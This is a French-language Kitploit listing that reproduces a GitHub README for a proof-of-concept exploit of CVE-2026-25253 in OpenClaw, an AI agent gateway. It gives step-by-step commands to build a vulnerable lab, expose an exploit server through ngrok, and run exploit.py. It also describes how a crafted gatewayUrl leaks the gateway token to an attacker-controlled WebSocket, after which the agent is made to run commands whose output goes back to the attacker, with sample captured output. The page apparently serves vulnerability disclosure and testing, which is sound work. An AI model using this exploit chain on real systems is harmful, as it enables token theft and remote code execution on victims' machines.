Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25253 — Proof-of-concept d'exploit pour CVE-2026-25253 dans OpenClaw : un gatewayUrl spécialement conçu exfiltre le jeton de passerelle de l'interface Control UI, permettant un accès non autorisé à la passerelle et une exécution de code à distance en 1 clic. | Kitploit
Outils/GitHubGitHub/yym8538/cve-2026-25253
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesSécurité WebTests d'IntrusionAuthentificationRed TeamingOutil d'Accès à Distance
GitHubyym8538/cve-2026-25253

CVE-2026-25253

Proof-of-concept d'exploit pour CVE-2026-25253 dans OpenClaw : un gatewayUrl spécialement conçu exfiltre le jeton de passerelle de l'interface Control UI, permettant un accès non autorisé à la passerelle et une exécution de code à distance en 1 clic.

1il y a 1 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25253 OpenClaw RCE en 1 clic

★ CVE-2026-25253 OpenClaw Exécution de code à distance en 1 clic PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Description

CVE-2026-25253 : Vulnérabilité d'exfiltration de jeton d'authentification OpenClaw

description : OpenClaw (alias clawdbot ou Moltbot) avant la version v2026.1.29 permet aux attaquants d'exfiltrer un jeton d'authentification de passerelle stocké en fournissant une valeur de chaîne de requête gatewayUrl spécialement conçue à l'interface de contrôle (Control UI), qui établit automatiquement une connexion WebSocket sans validation ni confirmation de l'utilisateur. Cela peut conduire à un accès non autorisé à la passerelle et à une exécution de code à distance en 1 clic.

Prérequis

  • Docker (Docker Desktop sous Windows)
  • Python 3.x (côté attaquant)

Fichiers

  • Dockerfile — construit l'environnement vulnérable OpenClaw
  • templates/ — pages web malveillantes utilisées par l'exploit
  • config.txt — configuration OpenClaw utilisée dans l'environnement victime
  • exploit.py — serveur d'exploitation
  • requirements.txt — dépendances du PoC

Configuration de l'environnement

  1. Construire l'image Docker
docker build -t openclaw-vuln .
  1. Lancer l'environnement (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Créer un tunnel SSH
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Mot de passe : openclawlab
  1. Accéder à l'interface de contrôle OpenClaw Ouvrez l'URL suivante dans le navigateur
http://127.0.0.1:18789/
  1. Saisissez le jeton de passerelle d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Cliquez sur Connect
  3. Ouvrez l'onglet Config
  4. collez le contenu de config.txt
  5. Remplacez le champ de clé API par votre clé API OpenAI
  6. Enregistrez la configuration
  7. Confirmez que l'agent répond normalement

Preuve de concept (PoC)

  1. Installer les dépendances (côté attaquant)
pip3 install -r requirements.txt
  1. Exposer le serveur d'exploitation via HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copiez le nom d'hôte de redirection généré
  1. Lancer le serveur d'exploitation
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Exemple :

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Déclencher l'attaque
  1. Ouvrez la page malveillante exposée par le serveur d'exploitation
  2. Simulez l'interaction de la victime avec la page
  3. Déclenchez le flux d'exploitation depuis le navigateur

Déroulement de l'attaque

  1. Une URL malveillante modifie le gatewayUrl de l'interface de contrôle de la victime
  2. Le navigateur se connecte automatiquement au point de terminaison WebSocket contrôlé par l'attaquant
  3. Le jeton d'authentification de la passerelle est divulgué à l'attaquant
  4. La page malveillante utilise le jeton volé pour ouvrir une nouvelle connexion WebSocket vers la passerelle OpenClaw locale de la victime
  5. Une requête d'exécution de commande est envoyée via l'agent
  6. Le résultat de l'exécution est renvoyé au serveur de l'attaquant

Résultat attendu

  • Le navigateur de la victime est redirigé vers le flux WebSocket malveillant
  • Le jeton d'authentification de la passerelle est capturé par l'attaquant
  • L'attaquant peut envoyer une requête d'exécution de commande via OpenClaw
  • La sortie de la commande est renvoyée au serveur de l'attaquant

Exemple de sortie

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Remarques

  • Ce PoC cible OpenClaw 2026.1.24-1
  • La chaîne d'exploitation repose sur la gestion vulnérable du gatewayUrl dans l'interface de contrôle
  • Pour un accès à distance à la victime, la page malveillante doit être servie via HTTPS
  • La passerelle OpenClaw locale est atteinte via le navigateur de la victime en tant que pont

EQST Insight

Nous publions une analyse de CVE et de malware une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Télécharger l’outil